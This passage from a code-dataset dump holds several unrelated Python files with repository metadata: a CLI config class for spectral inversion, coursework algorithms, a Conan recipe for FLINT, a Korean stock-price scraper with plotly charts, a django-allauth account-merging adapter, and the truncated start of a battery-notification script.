',\n '\"r\" stands for resistance/',\n 'resistivity, and \"c\" stands for conductance/',\n 'conductivity',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--data_format',\n 'metavar': 'FORMAT',\n },\n possible_values=[\n 'rmag_rpha',\n 'cre_cim',\n ],\n )\n\n self['nr_terms_decade'] = 20\n self.cfg['nr_terms_decade'] = self.cfg_obj(\n type='int',\n help=\"Number of polarization terms per frequency decade\",\n cmd_dict={\n 'short': '-n',\n 'long': '--nr_terms',\n 'metavar': 'INT',\n },\n )\n\n self['output_dir'] = 'results'\n self.cfg['output_dir'] = self.cfg_obj(\n type='string',\n help='Output directory',\n cmd_dict={\n 'short': '-o',\n 'long': '--output',\n 'metavar': 'DIR',\n }\n )\n\n self['plot_spectra'] = False\n self.cfg['plot_spectra'] = self.cfg_obj(\n type='bool',\n help='Plot final iterations',\n cmd_dict={\n 'short': '-p',\n 'long': '--plot',\n 'action': 'store_true',\n },\n )\n\n self['plot_reg_strength'] = False\n self.cfg['plot_reg_strength'] = self.cfg_obj(\n type='bool',\n help='Plot regularization strengths of final iterations',\n cmd_dict={\n 'short': None,\n 'long': '--plot_reg_strength',\n 'action': 'store_true',\n },\n )\n\n self['plot_it_spectra'] = False\n self.cfg['plot_it_spectra'] = self.cfg_obj(\n type='bool',\n help='Plot spectra of each iteration',\n cmd_dict={\n 'short': '-i',\n 'long': '--plot_its',\n 'action': 'store_true',\n }\n )\n\n self['silent'] = False\n self.cfg['silent'] = self.cfg_obj(\n type='bool',\n help='Do not plot any logs to STDOUT',\n cmd_dict={\n 'short': None,\n 'long': '--silent',\n 'action': 'store_true',\n }\n )\n\n self['use_tmp'] = False\n self.cfg['use_tmp'] = self.cfg_obj(\n type='bool',\n help=''.join((\n \"Create the output in a temporary directory and \",\n \"later move it later to its destination\",\n )),\n cmd_dict={\n 'short': None,\n 'long': '--tmp',\n 'action': 'store_true',\n }\n )\n\n self['tausel'] = 'data_ext'\n self.cfg['tausel'] = self.cfg_obj(\n type='string',\n help=''.join((\n \"Tau selection strategy:\\ndata: Use \",\n \"data frequency limits for tau selection\\ndata_ext \",\n \"(default): Extend tau ranges by one frequency decade \",\n \"compared to the 'data' strategy. Factors can be set \",\n \"for the low and high frequency by separating with a \",\n \"',': LEFT,RIGHT, e.g. '10,100'\"\n )),\n cmd_dict={\n 'short': None,\n 'long': '--tausel',\n 'metavar': 'STRATEGY',\n },\n )\n\n self['norm'] = None\n self.cfg['norm'] = self.cfg_obj(\n type='float',\n help=''.join((\n 'Normalize lowest frequency real part to this value',\n )),\n cmd_dict={\n 'short': None,\n 'long': '--norm',\n 'metavar': 'FLOAT',\n },\n )\n\n self['plot_lambda'] = None\n self.cfg['plot_lambda'] = self.cfg_obj(\n type='int',\n help=''.join((\n \"Plot the l-curve for a selected iteration. \",\n \"WARNING: This only plots the l-curve and does not \",\n \"use it in the inversion process. 
Use -1 for last \",\n \"iteration.\",\n )),\n cmd_dict={\n 'short': None,\n 'long': '--plot_lcurve',\n 'metavar': 'INT',\n },\n )\n\n self['max_iterations'] = 20\n self.cfg['max_iterations'] = self.cfg_obj(\n type='int',\n help='Maximum number of iterations',\n cmd_dict={\n 'short': None,\n 'long': '--max_it',\n 'metavar': 'INT',\n },\n )\n\n self['version'] = False\n self.cfg['version'] = self.cfg_obj(\n type='bool',\n help='Print version information',\n cmd_dict={\n 'short': '-v',\n 'long': '--version',\n 'action': 'store_true',\n },\n )\n\n self['output_format'] = 'ascii_audit'\n self.cfg['output_format'] = self.cfg_obj(\n type='string',\n help='Output format(ascii| ascii_audit)',\n cmd_dict={\n 'short': None,\n 'long': '--output_format',\n 'metavar': 'STRING',\n },\n )\n\n self['data_weighting'] = 're_vs_im'\n self.cfg['data_weighting'] = self.cfg_obj(\n type='string',\n help='Data weighting scheme to use.',\n cmd_dict={\n 'short': None,\n 'long': '--data_weighting',\n 'metavar': 'SCHEME',\n },\n possible_values=sorted(data_weighting.functions.keys()),\n )\n\n def get_cmd_parser(self):\n parser = OptionParser()\n for key in sorted(self.cfg.keys()):\n helptext = ''.join((\n self.cfg[key].help_text,\n ' (default: ',\n '{0}'.format(self[key]) + ')'\n ))\n opts = {\n 'type': self.cfg[key].type,\n 'dest': key,\n 'help': helptext,\n 'default': self[key],\n }\n\n # if self[key] is None:\n # opts['default'] = None\n\n for label in ('action', 'metavar'):\n if label in self.cfg[key].cmd_dict:\n opts[label] = self.cfg[key].cmd_dict[label]\n\n if 'action' in opts:\n del(opts['type'])\n\n if self.cfg[key].cmd_dict['short'] is not None:\n lso = [self.cfg[key].cmd_dict['short'], ]\n else:\n lso = []\n\n lso.append(self.cfg[key].cmd_dict['long'])\n\n parser.add_option(\n *lso,\n **opts\n )\n\n self.cmd_parser = parser\n return parser\n\n def parse_cmd_arguments(self):\n \"\"\"\n Parse the command line arguments and update the dictionary\n \"\"\"\n if self.cmd_parser is None:\n self.get_cmd_parser()\n\n (options, args) = self.cmd_parser.parse_args()\n\n # multi threading does not work on Windows\n if platform.system() == \"Windows\":\n options.nr_cores = 1\n\n # print version information if requested\n if options.version:\n logging.info(version._get_version_numbers())\n exit()\n\n # update the self-dict with the new values\n for key in self.keys():\n self[key] = getattr(options, key)\n\n return options\n\n def split_options_base(self):\n \"\"\"\n Prepare dicts containing preparation and inversion settings common to\n all cdd_* programs\n \"\"\"\n prep_opts = {key: self[key] for key in (\n 'plot_it_spectra',\n 'plot_reg_strength',\n 'output_dir',\n 'data_format',\n 'plot_lambda',\n )\n }\n # prep_opts['plot_it_spectra'] = options.plot_it_spectra\n prep_opts['plot'] = self['plot_spectra']\n # prep_opts['plot_reg_strength'] = options.plot_reg_strength\n # prep_opts['output_dir'] = options.output_dir\n # prep_opts['data_format'] = options.data_format\n # prep_opts['plot_lambda'] = options.plot_lambda\n\n inv_opts = {key: self[key] for key in (\n 'tausel',\n 'max_iterations',\n 'data_weighting',\n )\n }\n # inv_opts['tausel'] = options.tausel\n inv_opts['Nd'] = self['nr_terms_decade']\n # inv_opts['max_iterations'] = options.max_iterations\n\n return prep_opts, inv_opts\n\n def check_input_files(self, additional_files=[]):\n \"\"\"Check if the input files exist. 
In addition to the base files for\n data and frequency, also test for all filenames stored in the\n corresponding attributes as provided by the extra list.\n \"\"\"\n none_missing = True\n base_files = ['frequency_file', 'data_file']\n for attr in base_files + additional_files:\n filename = self[attr]\n if not os.path.isfile(filename):\n logging.info(\n 'Filename not found for attribute {0}: {1}'.format(\n attr, filename\n )\n )\n none_missing = False\n else:\n if not none_missing:\n exit()\n\n # check if output directory already exists\n if os.path.isdir(self['output_dir']):\n raise IOError(\n 'Output directory already exists. Please choose another ' +\n 'output directory, or delete the existing one.')\n\n def __repr__(self):\n output = '\\n'\n output += 'CCD configuration:\\n'\n for key in sorted(self.keys()):\n output += 'Entry {0}:{1}\\n'.format(key, self[key])\n\n output += '--- end ---'\n\n return output\n","repo_name":"m-weigand/ccd_tools","sub_path":"lib/lib_dd/config/cfg_base.py","file_name":"cfg_base.py","file_ext":"py","file_size_in_byte":13391,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"7915671356","text":"#\"I pledge my honor that I have abided by the Stevens Honor System\"\n#Ethan Kalika\n\ndef change(amount, coins):\n \"\"\"\n Input: an integer amount that must be reached and a list of possible coin values (the first element is assumed to always be 1)\n Output: The minimum number of coins with which ammount can be made\n \"\"\"\n if amount == 0:\n return 0\n elif amount < 0 or coins == []:\n return float(\"inf\")\n else:\n use_it = 1 + change(amount - coins[0], coins)\n loose_it = change(amount, coins[1:])\n return min(use_it, loose_it)\n","repo_name":"EthanKalika/StevensClasses","sub_path":"CS115IntrotoPython/Lab3_CoinProblem1/lab3.py","file_name":"lab3.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"74181085689","text":"from algo1 import *\r\nfrom linkedlist import *\r\nfrom diccionary import *\r\n\r\ndef busquedaBinaria(lista, x): \r\n currentnode = lista.head\r\n A = Array(length(lista),0)\r\n cont = 0\r\n while currentnode != None:\r\n A[cont] = currentnode.value\r\n currentnode = currentnode.nextNode\r\n cont = cont + 1\r\n i = 0\r\n pivote = len(A) // 2\r\n j = len(A) - 1\r\n flag = True\r\n while flag == True:\r\n if j == pivote or i == pivote or A[pivote] == x:\r\n return True\r\n if A[pivote] > x:\r\n j = pivote - 1\r\n pivote = i + (j - i)//2\r\n if A[pivote] < x: \r\n i = pivote + 1\r\n pivote = i + (j - i)//2\r\n return False\r\n\r\ndef busquedaKesimo(lista, k):\r\n large = length(lista)\r\n busquedaKesimoWrapped(lista,0,large - 1,k-1)\r\n return access(lista,k-1)\r\n\r\ndef busquedaKesimoWrapped(L,inicio,fin,position):\r\n if inicio > fin:\r\n return\r\n pivote = accesposition(L,(fin + inicio)//2) #Busco el pivote entre 3 opciones\r\n initnode = accesposition(L,inicio)\r\n pivotevalue = pivote.value #Me guardo el value del pivote para el proximo switch\r\n switchvalues(initnode,pivote) #cambio el valor del pivote\r\n delimitador = initnode #Inicio un puntero que va avanzando para ordenar la lista con los menores a la izquierda\r\n currentnode = initnode\r\n inicioposicion = inicio\r\n for n in range(inicio, fin + 1):\r\n if currentnode.value < pivotevalue:\r\n delimitador = delimitador.nextNode #avanzo el delimitador para cambiarlo\r\n switchvalues(delimitador,currentnode)\r\n 
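\r\n# A bottom-up sketch of the same minimum-coin count as the recursive change() above (standard tabulation, not part of either original file):\r\n# def change_dp(amount, coins):\r\n#     best = [0] + [float('inf')] * amount\r\n#     for a in range(1, amount + 1):\r\n#         for c in coins:\r\n#             if c <= a:\r\n#                 best[a] = min(best[a], 1 + best[a - c])\r\n#     return best[amount]\r\n        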
inicioposicion = inicioposicion +1\r\n currentnode = currentnode.nextNode\r\n switchvalues(initnode,delimitador)\r\n if position <= inicioposicion: \r\n busquedaKesimoWrapped(L,inicio, inicioposicion-1,position)\r\n if position > inicioposicion:\r\n busquedaKesimoWrapped(L,inicioposicion+1,fin,position)\r\ndef switchvalues(nodeA,nodeB):\r\n value1 = nodeA.value\r\n value2 = nodeB.value\r\n nodeA.value = value2\r\n nodeB.value = value1\r\n #Obtiene el pivote de la lista comparando el inicio, el fin y la mitad\r\n\r\n\r\ndef subsecuenciaCreciente_DnC(numeros):\r\n L = LinkedList()\r\n for n in range(len(numeros)):\r\n add(L,numeros[n])\r\n return subsecuenciaCreciente_DnCWrapped(L)\r\ndef subsecuenciaCreciente_DnCWrapped(L):\r\n large = length(L)\r\n if large == 1 or large == 2:\r\n if large == 2:\r\n if isSubCreciente(L) == True:\r\n return L\r\n else:\r\n return getMinor(L)\r\n else:\r\n return L\r\n mid = int(large/2)\r\n Le = LinkedList() #Creo la lista izquierda\r\n currentnode = L.head\r\n for n in range(0,mid): #Paso los elementos hasta la mitad\r\n add(Le,currentnode.value)\r\n currentnode = currentnode.nextNode\r\n Le = inverse(Le)\r\n R = LinkedList() #Creo la lista derecha\r\n for u in range(mid+1,large +1 ): #Lo mismo\r\n add(R,currentnode.value)\r\n currentnode = currentnode.nextNode\r\n R = inverse(R)\r\n Left = subsecuenciaCreciente_DnCWrapped(Le) #Llamo a la recursividad del lado izquierdo y lo guardo\r\n Right = subsecuenciaCreciente_DnCWrapped(R) #LLamo a la recursividad del lado derecho y lo guardo\r\n return gitmerge(Left,Right) #Merge a los resultados\r\n#Funcion que mergea 2 listas en 1 y los ordena\r\n\r\ndef gitmerge(L,R):\r\n Lfinal = LinkedList()\r\n largeL = length(L)\r\n largeR = length(R)\r\n i = j = 0\r\n nodeleft = L.head\r\n noderight = R.head\r\n lastNodeLeft = accesposition(L,largeL-1)\r\n if lastNodeLeft.value < R.head.value:\r\n lastNodeLeft.nextNode = R.head\r\n return L\r\n else:\r\n if largeL == 1:\r\n return R\r\n nodeL = accesposition(L,largeL-2)\r\n cont = 2\r\n while nodeL != L.head:\r\n if nodeL.value < R.head.value:\r\n nodeL.nextNode = R.head\r\n return L\r\n else:\r\n cont = cont + 1\r\n nodeL = accesposition(L,largeL-cont)\r\ndef isSubCreciente(L):\r\n currentnode = L.head\r\n if length(L) == 1:\r\n return True\r\n while currentnode.nextNode != None:\r\n if currentnode.value > currentnode.nextNode.value:\r\n return False\r\n currentnode = currentnode.nextNode\r\n return True\r\n\r\ndef getMinor(L):\r\n currentnode = L.head\r\n Lminor = LinkedList()\r\n if currentnode.value > currentnode.nextNode.value:\r\n add(Lminor, currentnode.nextNode.value)\r\n else:\r\n add(Lminor, currentnode.value)\r\n return Lminor\r\n\r\n#Ejercicio 4\r\nclass CharWithPos:\r\n char = None\r\n position = None\r\n\r\n\r\ndef distancia(string1, string2): \r\n string1 = String(string1)\r\n string2 = String(string2)\r\n largo1 = len(string1)\r\n largo2 = len(string2)\r\n dist = 0\r\n String1List= LinkedList()\r\n for n in range(len(string1)-1,-1,-1):\r\n char = CharWithPos()\r\n char.char = string1[n]\r\n char.position = n\r\n add(String1List,char)\r\n\r\n String2List= LinkedList()\r\n for i in range(len(string2)-1,-1,-1):\r\n char = CharWithPos()\r\n char.char = string2[i]\r\n char.position = i\r\n add(String2List,char) \r\n\r\n if largo1 > largo2:\r\n L = charsUsed(String1List,String2List)\r\n corto = string2\r\n else:\r\n L = charsUsed(String2List,String1List)\r\n corto = string1\r\n\r\n definitive = Array(len(corto),\"\")\r\n currentNode = L.head\r\n while currentNode 
!= None:\r\n if currentNode.value.position < len(corto) -1:\r\n if corto[currentNode.value.position] == currentNode.value.char:\r\n definitive[currentNode.value.position] = currentNode.value.char\r\n currentNode = currentNode.nextNode\r\n \r\n for i in range(len(definitive)):\r\n if definitive[i] == None:\r\n dist = dist + 1\r\n\r\n return dist\r\n \r\n\r\ndef extractCharsUsed(stringLarge, stringShort):\r\n L = LinkedList()\r\n D = Array(127,Diccionary())\r\n cantidadDeExistencias = 0\r\n currentNode = stringLarge.head\r\n while currentNode != None:\r\n dic_insert(D,ord(currentNode.value.char),currentNode.value,ord(currentNode.value.char))\r\n currentNode = currentNode.nextNode\r\n currentNode = stringShort.head\r\n while currentNode != None:\r\n if D[ord(currentNode.value.char)] != None:\r\n cantidadDeExistencias = cantidadDeExistencias + 1\r\n add(L,D[ord(currentNode.value.char)].head.value)\r\n dic_insert(D,ord(currentNode.value.char),currentNode.value,ord(currentNode.value.char))\r\n \r\n currentNode = currentNode.nextNode\r\n if cantidadDeExistencias == length(stringLarge):\r\n return L\r\n else: \r\n return None\r\n\r\ndef charsUsed(stringLarge, stringShort):\r\n if stringLarge == None:\r\n return None\r\n large = length(stringLarge)\r\n L = extractCharsUsed(stringLarge,stringShort)\r\n if L != None: #Recursividad principal\r\n return L\r\n if stringLarge.head.nextNode == None: #Si el valor esta solo\r\n return None\r\n mid = int(large/2)\r\n Le = LinkedList() #Creo la lista izquierda\r\n currentnode = stringLarge.head\r\n for n in range(0,mid): #Paso los elementos hasta la mitad\r\n add(Le,currentnode.value)\r\n currentnode = currentnode.nextNode\r\n Le = inverse(Le)\r\n R = LinkedList() #Creo la lista derecha\r\n for u in range(mid+1,large +1 ): #Lo mismo\r\n add(R,currentnode.value)\r\n currentnode = currentnode.nextNode\r\n R = inverse(R)\r\n Left = charsUsed(Le, stringShort) #Llamo a la recursividad del lado izquierdo y lo guardo\r\n Right = charsUsed(R, stringShort) #LLamo a la recursividad del lado derecho y lo guardo\r\n return gitmergeChars(Left,Right)\r\n\r\ndef gitmergeChars(L,R):\r\n Lfinal = LinkedList()\r\n if L != None and R != None: \r\n largeL = length(L)\r\n nodeleft = L.head\r\n lastNodeLeft = accesposition(L,largeL-1)\r\n lastNodeLeft.nextNode = R.head\r\n return L\r\n else:\r\n if R != None:\r\n return R\r\n if L != None:\r\n return L\r\n","repo_name":"Landriou/Estrategia-algoritmicos","sub_path":"DivideAndConquer.py","file_name":"DivideAndConquer.py","file_ext":"py","file_size_in_byte":8118,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"14990610815","text":"# Move Element To End\n# 🟠 Medium\n#\n# https://www.algoexpert.io/questions/move-element-to-end\n#\n# Tags: Array - Two Pointers\n\nimport timeit\n\n\n# Use a read and an insert pointers, first make sure that the value\n# under the insert pointer is not the target value, then check the read\n# pointer and, if it holds the target value, swap them and slide both\n# pointers.\n#\n# Time complexity: O(n) - We will visit each element once.\n# Space complexity: O(1) - Constant extra memory.\nclass Solution:\n def moveElementToEnd(self, array, toMove):\n # Use two pointers, read and insert.\n read, insert = 0, len(array) - 1\n while read < insert:\n # If the value under the insert pointer is the\n # target, we don't want to insert there.\n if array[insert] == toMove:\n insert -= 1\n continue\n # Insert now points to a different value.\n # If read points 
to the target value, swap it with insert.\n if array[read] == toMove:\n array[read], array[insert] = array[insert], array[read]\n insert -= 1\n # Always slide the read pointer.\n read += 1\n return array\n\n\ndef test():\n executors = [Solution]\n tests = [\n [[], 8, []],\n [[3, 3, 3, 3, 3], 3, [3, 3, 3, 3, 3]],\n [[3, 1, 2, 4, 5], 3, [5, 1, 2, 4, 3]],\n [[2, 1, 2, 2, 2, 3, 4, 2], 2, [4, 1, 3, 2, 2, 2, 2, 2]],\n ]\n for executor in executors:\n start = timeit.default_timer()\n for _ in range(1):\n for col, t in enumerate(tests):\n sol = executor()\n result = sol.moveElementToEnd(t[0], t[1])\n exp = t[2]\n assert result == exp, (\n f\"\\033[93m» {result} <> {exp}\\033[91m for\"\n + f\" test {col} using \\033[1m{executor.__name__}\"\n )\n stop = timeit.default_timer()\n used = str(round(stop - start, 5))\n cols = \"{0:20}{1:10}{2:10}\"\n res = cols.format(executor.__name__, used, \"seconds\")\n print(f\"\\033[92m» {res}\\033[0m\")\n\n\ntest()\n","repo_name":"raul-sauco/coding-challenges","sub_path":"algoexpert/move-element-to-end.py","file_name":"move-element-to-end.py","file_ext":"py","file_size_in_byte":2133,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"31940688175","text":"import os\n\nfrom conans import ConanFile, CMake, tools\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass FlintConan(ConanFile):\n name = \"flint\"\n description = \"FLINT (Fast Library for Number Theory)\"\n license = \"LGPL-2.1-or-later\"\n topics = (\"math\", \"numerical\")\n homepage = \"https://www.flintlib.org\"\n url = \"https://github.com/conan-io/conan-center-index\"\n exports_sources = [\"CMakeLists.txt\", \"patches/**\"]\n generators = \"cmake\"\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n }\n\n _cmake = None\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n @property\n def _build_subfolder(self):\n return \"build_subfolder\"\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n\n def requirements(self):\n self.requires(\"gmp/6.2.1\")\n self.requires(\"mpfr/4.1.0\")\n if self.settings.compiler == \"Visual Studio\":\n self.requires(\"pthreads4w/3.0.0\")\n\n def source(self):\n tools.get(**self.conan_data[\"sources\"][self.version], destination=self._source_subfolder, strip_root=True)\n\n def build(self):\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n tools.patch(**patch)\n cmake = self._configure_cmake()\n cmake.build()\n\n def _configure_cmake(self):\n if self._cmake:\n return self._cmake\n self._cmake = CMake(self)\n self._cmake.definitions[\"BUILD_TESTING\"] = False\n self._cmake.definitions[\"BUILD_DOCS\"] = False\n self._cmake.definitions[\"WITH_NTL\"] = False\n # IPO/LTO breaks clang builds\n self._cmake.definitions[\"IPO_SUPPORTED\"] = False\n # No BLAS yet\n self._cmake.definitions[\"CMAKE_DISABLE_FIND_PACKAGE_CBLAS\"] = True\n # handle run in a cross-build\n if tools.cross_building(self):\n self._cmake.definitions[\"FLINT_USES_POPCNT_EXITCODE\"] = \"1\"\n self._cmake.definitions[\"FLINT_USES_POPCNT_EXITCODE__TRYRUN_OUTPUT\"] = \"\"\n self._cmake.configure(build_folder=self._build_subfolder)\n return self._cmake\n\n def package(self):\n self.copy(\"LICENSE\", dst=\"licenses\", src=self._source_subfolder)\n cmake = 
self._configure_cmake()\n cmake.install()\n\n def package_info(self):\n self.cpp_info.names[\"cmake_find_package\"] = \"libflint\"\n self.cpp_info.names[\"cmake_find_package_multi\"] = \"libflint\"\n\n if self.settings.os in (\"FreeBSD\", \"Linux\"):\n self.cpp_info.system_libs = [\"pthread\", \"m\"]\n\n self.cpp_info.includedirs.append(os.path.join(\"include\", \"flint\"))\n self.cpp_info.libs = tools.collect_libs(self)\n","repo_name":"conan-io/conan-center-index","sub_path":"recipes/flint/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2949,"program_lang":"python","lang":"en","doc_type":"code","stars":835,"dataset":"github-code","pt":"77"} +{"seq_id":"40037945895","text":"# 한국 거래소 데이터 => 종목코드\n\n# 네이버 금융에 특정 기업을 분석한다. 분석 대상은 신라젠이라는 기업.\n\n# jupyter notebook은 반드시 크롬에서 실행한다.\n\n\nimport pandas as pd\n\n# html에 있는 정보를 읽어온다.\n\n# header = 0 으로 맨 윗줄의 데이터를 헤더로 사용하고 얻은 자료를 리스트 형태로 이용하기 위해 뒤에 [0] 을 붙여준다.\n\ncode_df = pd.read_html('http://kind.krx.co.kr/corpgeneral/corpList.do?method=download&searchType=13', header=0)[0]\n\n# 타입을 확인\n\nprint(type(code_df)) # \n\nprint(code_df.head()) # 데이터를 확인\n\n# code_df에 있는 '종목코드' 컬럼을 0을 채운 6자리 포멧으로 맞춰준다.\n\ncode_df.종목코드 = code_df.종목코드.map('{:06d}'.format)\n\n# code_df를 회사명과 종목코드 컬럼만 뽑아낸다.\n\n# ***참고*** pandas에서 컬럼을 선택 할 때\n\n# 단일개 선택: df['컬럼명'] or df.컬럼명\n\n# 여러개 선택: df[['컬럼명', ... ,'컬럼명']]\n\ncode_df = code_df[['회사명', '종목코드']]\n\nprint(code_df) # 데이터를 확인\n\n# 한글로된 컬럼명을 영어로 바꿔준다.\n\ncode_df = code_df.rename(columns={'회사명': 'name', '종목코드': 'code'})\n\n\n# 신라젠 네이버 금융 주소. http://finance.naver.com/item/main.nhn?code=215600\n\n# 함수 생성 => 특정한 업체만 코드를 가져오기 위해서\n\ndef get_url(item_name, code_df):\n # 코드를 가져오기 위한 처리.\n\n # 먼저 .query(\"name=='{}'\".format(item_name))['code']는 name 컬럼에 item_name과 동일한 값의 code값을 반환한다는 뜻.\n\n # 즉, .query(\"쿼리\".format(쿼리에 넣을 데이터))[얻을 자료]\n\n # .to_string(index = False)로 위에서 얻어진 값에 index를 빼고 string타입으로 바꿔준다.\n\n code = code_df.query(\"name=='{}'\".format(item_name))['code'].to_string(index=False)\n\n # url은 일일 종가 시가 고가 저가 거래량을 보여주는 표이다.\n\n url = 'http://finance.naver.com/item/sise_day.nhn?code={code}'.format(code=code)\n\n print(\"요청 URL = {}\".format(url))\n\n return url\n\n\n# 신라젠 정보 가져오기\n\nitem_name = '신라젠'\n\nurl = get_url(item_name, code_df)\n\ndf = pd.DataFrame()\n\n# 크롤링. 페이지 20까지 크롤링을 한다.\n\nfor page in range(1, 21):\n # 위에서 얻은 url에 page를 붙여줘서 url 포멧을 만들어준다.\n\n pg_url = '{url}&page={page}'.format(url=url, page=page)\n\n # pandas의 df에 위에서 얻은 url을 넣어줘서 우리가 구하고자 하는 데이터프레임을 만든다.\n\n # 데이터프레임을 만들 때 리스트에 [0]을 붙여줘서 만들 수 있음을 다시 확인.\n\n df = df.append(pd.read_html(pg_url, header=0)[0], ignore_index=True)\n\n# df.dropna()를 이용해 결측값(NaN) 있는 행을 제거한다.\n\ndf = df.dropna()\n\n# 상위 5개 데이터 확인하기\n\nprint(df.head())\n\n# 한글로 된 컬럼명을 영어로 바꿔준다.\n\ndf = df.rename(columns={'날짜': 'date', '종가': 'close', '전일비': 'diff',\n\n '시가': 'open', '고가': 'high', '저가': 'low', '거래량': 'volume'})\n\n# 데이터의 타입을 int형으로 바꿔줌. \\(역슬래쉬)는 뒤에 데이터가 이어진다는 의미이다. 한줄로 쓰면 \\ 필요없음.\n\ndf[['close', 'diff', 'open', 'high', 'low', 'volume']] \\\n \\\n = df[['close', 'diff', 'open', 'high', 'low', 'volume']].astype(int)\n\n# 컬럼명 'date'의 타입을 date로 바꿔줌\n\ndf['date'] = pd.to_datetime(df['date'])\n\n# 일자(date)를 기준으로 오름차순 정렬\n\ndf = df.sort_values(by=['date'], ascending=True)\n\n# 상위 5개 데이터 확인\n\nprint(df.head())\n\n# 시각화 파트\n\n\n# jupyter notebook 에서 출력. 
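\n# DataFrame.append was removed in pandas 2.0; a hedged sketch of the same paging loop (hypothetical helper, reusing the url variable built above) collects the per-page tables and concatenates once.\ndef crawl_pages(url, n_pages=20):\n    pages = [pd.read_html('{}&page={}'.format(url, p), header=0)[0]\n             for p in range(1, n_pages + 1)]\n    return pd.concat(pages, ignore_index=True).dropna()\n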
꼭 jupyter notebook에서 해야한다.\n\n# 만약 jupyter notebook에서 출력하기 싫다면 아래에 적어놓는 방법을 이용하자.\n\n\nimport plotly.offline as offline\n\nimport plotly.graph_objs as go\n\n# plotly 접속\n\noffline.init_notebook_mode(connected=True)\n\n# 그래프를 생성. x축에는 날짜, y축에는 종가, 그래프 이름은 item_name에서 가져온다.\n\ntrace = go.Scatter(x=df.date, y=df.close, name=item_name)\n\n# 위에 데이터 정보를 data라는 객체의 리스트로 담아준다.\n\ndata = [trace]\n\n# 레이아웃 잡기\n\nlayout = dict(title='{}의 종가(close) Time Series'.format(item_name), # 타이틀 생성.\n\n xaxis=dict(\n\n rangeselector=dict(\n\n buttons=list([ # 한 달, 세 달, 6달, 전체 종가를 보여주는 버튼을 만든다.\n\n dict(\n\n count=1, # 1개씩 센다. 여기서는 step='month'이기 때문에 1달이 된다.\n\n label='1m', # 라벨 이름. 그래프에 1m이라는 버튼을 만든다.\n\n step='month', # 한 달을 기준으로 잡아서 count를 센다.\n\n stepmode='backward'), # 가장 최근 데이터부터 센다. forward는 가장 오래된 데이터부터 센다.\n\n dict(\n\n count=3,\n\n label='3m',\n\n step='month',\n\n stepmode='backward'),\n\n dict(\n\n count=6,\n\n label='6m',\n\n step='month',\n\n stepmode='backward'),\n\n dict(\n\n step='all')])), # 전체 데이터를 출력한다. step='all'은 label을 설정할 수 없다.\n\n rangeslider=dict(),\n\n type='date'\n\n )\n\n )\n\n# graph object에 data, layout을 저장한다.\n\nfig = go.Figure(data=data, layout=layout)\n\n# 플롯을 출력한다.\n\noffline.iplot(fig)\n\n# jupyter notebook 에서 출력하기 싫을 때 사용하는 방법.\n\n# html로 만든다.\n\n\nimport plotly.offline as offline\n\nimport plotly.graph_objs as go\n\n# # plotly 접속\n\n# offline.init_notebook_mode(connected=True)\n\n# 그래프를 생성. x축에는 날짜, y축에는 종가, 그래프 이름은 item_name에서 가져온다.\n\ntrace = go.Scatter(x=df.date, y=df.close, name=item_name)\n\n# 위에 데이터 정보를 data라는 객체의 리스트로 담아준다.\n\ndata = [trace]\n\n# 레이아웃 잡기\n\nlayout = dict(title='{}의 종가(close) Time Series'.format(item_name), # 타이틀 생성.\n\n xaxis=dict(\n\n rangeselector=dict(\n\n buttons=list([ # 한 달, 세 달, 6달, 전체 종가를 보여주는 버튼을 만든다.\n\n dict(\n\n count=1, # 1개씩 센다. 여기서는 step='month'이기 때문에 1달이 된다.\n\n label='1m', # 라벨 이름. 그래프에 1m이라는 버튼을 만든다.\n\n step='month', # 한 달을 기준으로 잡아서 count를 센다.\n\n stepmode='backward'), # 가장 최근 데이터부터 센다. forward는 가장 오래된 데이터부터 센다.\n\n dict(\n\n count=3,\n\n label='3m',\n\n step='month',\n\n stepmode='backward'),\n\n dict(\n\n count=6,\n\n label='6m',\n\n step='month',\n\n stepmode='backward'),\n\n dict(\n\n step='all')])), # 전체 데이터를 출력한다. 
step='all'은 label을 설정할 수 없다.\n\n rangeslider=dict(),\n\n type='date'\n\n )\n\n )\n\n# graph object에 data, layout을 저장한다.\n\nfig = go.Figure(data=data, layout=layout)\n\n# 플롯을 출력한다.\n\noffline.iplot(fig)\n\n# 여기까지 끝나면 temp-plot.html이 생성되는데 이걸 출력하면 jupyter에서 출력되는 것과 동일한 그래프가 나온다.\n\n# 경로와 이름을 지정하고 싶으면 offline.plot(fig, filename = '원하는 경로/원하는 이름.html')을 하면 된다.\n","repo_name":"mistrel-git/my_project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8413,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13037826791","text":"from allauth.socialaccount.adapter import DefaultSocialAccountAdapter\n\nfrom .models import User\n\n\nclass SocialAccountAdapter(DefaultSocialAccountAdapter):\n\n def pre_social_login(self, request, sociallogin):\n \"\"\"\n Override in order to merge accounts that are email verified.\n \"\"\"\n\n # Already exists\n if sociallogin.is_existing:\n return\n\n # we need the email for login\n if 'email' not in sociallogin.account.extra_data:\n return\n\n try:\n user = User.objects.get(\n emailaddress__email__iexact=sociallogin.account.extra_data['email'],\n emailaddress__verified=True,\n )\n except User.DoesNotExist:\n return\n\n sociallogin.connect(request, user)\n","repo_name":"studyhub-co/physics-is-beautiful","sub_path":"pib_auth/adapters.py","file_name":"adapters.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"77"} +{"seq_id":"23297328012","text":"import psutil\r\nfrom plyer import notification\r\nimport time\r\n\r\n#import sensors battery class from psutils which contains 